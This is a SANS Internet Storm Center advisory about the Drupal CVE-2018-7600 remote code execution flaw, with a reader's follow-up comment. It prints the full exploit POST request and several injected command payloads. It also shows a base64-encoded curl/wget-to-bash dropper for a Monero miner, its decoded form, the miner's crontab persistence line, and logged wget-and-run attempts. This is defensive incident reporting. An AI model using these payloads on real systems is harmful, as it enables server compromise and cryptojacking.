Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Drupal CVE-2018-7600 PoC is Public - SANS Internet Storm Center SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Drupal CVE-2018-7600 PoC is Public

[Update: Now used to install Monero Miners. See below for details]

Drupal announced a Remote Code Execution vulnerability affecting Drupal 7.x and 8.x on March 28 (

Proof of concpet code appeared on github on April 12th.  Quick testing on handler's honeypots indicate that it functions as advertised.

Upgrade to 7.58 or 8.5.1

Scans/attemps are showing up in other Handlers' honeypots: - - [13/Apr/2018:03:20:55 +0200] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 38174 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0"

And here is a second exploit attempt, trying to identify vulnerable servers:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: <hostname>
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=ping <hostname> -c 1

The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as is a wildcard DNS entry, and * appears to resolve to right now. So the detection of who is "pinging" is made most likely via DNS.

The authoritative name server for "" is ns[12], which appears to belong to a Chinese security news site. Maybe they are working on a story to publish how many vulnerable systems there are, but actual exploitation of a vulnerability, even if somewhat benign, may be a step too far for a news story.

Other payloads spotted so far:

echo `whoami`
echo 123
touch 1.html
echo "xiokv"

The exploit attempts are currently arriving at a pretty brisk pace.

Here is one installing the standard xmrig Monero miner. The exploit string (spaces added to allow for wrapping on small screens):

echo KC91c3IvYmluL2N1cmwgLWZzU0wgaHR0c DovL3RjOHpkdy5pZjFqMHl0Z2t5cGEudGsvaSB8 fCAvdXNyL2Jpbi93Z2V0IGh0dHA6Ly90Yzh6 ZHcuaWYxajB5dGdreXBhLnRrL2kgLXFPLSkgfCAvYmluL2Jhc2g= | base64 -d | bash

This decodes to: (http replaced with hxxp)

/usr/bin/curl -fsSL hxxp:// || /usr/bin/wget hxxp:// -qO-) | /bin/bash

"i" is an installer script. It collects information about the system and makes itself persistent via an entry in the crontab:

*/30 * * * *   root   pkill -f /tmp/ ; (curl -fsSL http://${host}/i -o ${FN} || wget http://${host}/i -q -O ${FN}) ; bash ${FN} 1 &

It also download additional files:

  • A script to kill competing miners:
  • and the actual xmrig miner: (the filename depends on the output from "getconf LONG_BIT")

the miner will then connect to port 6666 on , which currently resolves to and

Kevin Liston

292 Posts
ISC Handler
Apr 13th 2018
Our site has updated to drupal 7.59 and the problem still exists.

Centos 7.3 / sw-nginx-1.11.1-centos7.17071211.x86_64

Suggestions ?

Can you tell me which /tmp file it is using for the download ?

They are using Python to submit the POST. I have tried to simulate the post by doesnt' work, any suggestions ?

Any assistance would be appreciated.

Below is just one example, have quite a few if needed. The logs indicate only a POST is being issued. - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=wget%20-O%20/tmp/;%20sh%20/tmp/[%23type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7" - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[#post_render][]=passthru&name[#markup]=wget -O /tmp/; sh /tmp/[#type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7"

Sign Up for Free or Log In to start participating in the conversation!